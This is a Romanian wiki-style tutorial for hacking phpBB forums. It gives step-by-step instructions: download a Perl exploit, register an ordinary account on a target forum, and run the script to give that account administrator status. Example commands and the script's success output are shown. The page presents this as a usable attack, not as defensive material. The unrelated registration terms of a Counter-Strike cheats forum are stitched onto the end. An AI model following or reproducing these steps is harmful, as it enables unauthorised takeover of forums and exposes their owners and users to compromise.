Phpbb hack

De la EuroDomenii - Domenii .Eu .Ro Registrator Acreditat

Salt la: navigare, căutare

Intai de toate trebuie sa downloadam exploitul care se gaseste aici

Acum va trebuii sa downloadam Active Perl care se gaseste pe http://www.activestate.com

Acum sa incepem Hack.
Prima data ne inregistram pe forum cu orice nick nu conteaza dar tinem minte parola si userul. ( Eu am inregistrat userul quickkill )
Dupa deschidem DOS Start > Run > Cmd
Aici in DOS Scriem C:\exploit.pl
Daca totul e ok perl e instalat bine va aparea asa ceva.
++++++++++++++++++++++++++++++++++++++++++++++ +++++
Usage: perl nenu.pl \[site\] \[phpbb folder\] \[username\] \[proxy (optional)\]
i.e. perl nenu.pl http://www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++

Ok. acum scriem asa Exploit.pl site /director/ nick inregistrat (proxy optional)
Acum avem Exploit.pl fun.fun.com /forum/ quickkill
Daca merge va da mesajul:
++++++++++++++++++++++++++++++++++++
Trying to connect to fun.fun.com/forum/
Forum is vulnerable!!!
+++++++++++++++++++++++++++++
Trying to get the user: kapiteinkoek ID...
Done... ID=15
++++++++++++++++++++++++++++++
Trying to give user:quickkill admin status...
Well done!!! quickkill should now have an admin status..
++++++++++++++++++++++++++++

Acum te duci pe forum te loggerhead si in josul paginii va trebuii sa vezi un text link cu (administration panel) Si Esti Admin

Acest tutorial merge numai cu exploitul PERL ...
SursaHack and Cheats for Counter-Strike - Înregistrare

Accesând “Hack and Cheats for Counter-Strike”, sunteţi de acord să intraţi din punct de vedere legal sub incidenţa următorilor termeni. Dacă nu sunteţi de acord cu toţi aceşti termeni, vă rugăm să nu accesaţi şi/sau folosiţi “Hack and Cheats for Counter-Strike”. Putem schimba acest lucru oricând şi ne vom strădui să vă informăm, deşi ar fi prudent să verificaţi aceşti termeni în mod regulat în timp ce folosiţi “Hack and Cheats for Counter-Strike” pentru că după modificări sunteţi de acord să intraţi sub incidenţa legală a acestor termeni din momentul actualizării/amendării lor.

Forumul nostru foloseşte phpBB, care este o soluţie publicată sub incidenţa “Licenţei Generală Publică” (abreviată “GPL”) şi poate fi descărcat de la www.phpbb.com. Software-ul phpBB facilitează doar discuţiile care au ca mijloc de comunicare internetul, grupul phpBB nu este responsabill în ceea ce site-ul acceptă sau nu din punct de vedere al conţinutului permis şi/sau a conduitei. Pentru mai multe informaţii despre phpBB, vă rugăm să vizitaţi: http://www.phpbb.com/.

Sunteţi de acord să nu scrieţi niciun material abuziv, obscen, vulgar, calomnios, de ură, ameninţare, orientare-sexuală sau orice alt material care poate viola prevederile legale ale ţării dumneavoastră, ale ţării unde “Hack and Cheats for Counter-Strike” este găzduit sau ale legislaţiei internaţionale. Nerespectarea acestor prevederi poate duce la blocarea imediată şi permanentă însoţită de notificarea Internet-Service-Provider-ului dumneavoastră dacă vom considera necesar. Adresele IP ale tuturor mesajelor sunt înregistrate pentru a ajuta la întărirea acestor condiţii. Sunteţi de acord ca “Hack and Cheats for Counter-Strike” să aibă dreptul de a şterge, modifica, muta sau închide orice subiect în orice moment în care consideră potrivit. Ca utilizator sunteţi de acord ca orice informaţie introdusă să fie stocată în baza de date. Aceste informaţii nu vor fi dezvăluite niciunei terţe părţi fără consimţământul dumneavoastră, iar “Hack and Cheats for Counter-Strike” sau phpBB nu pot fi consideraţi responsabili pentru vreo încercare de hacking care poate duce la compromiterea datelor.Sursa

Unelte personale
Trusa de unelte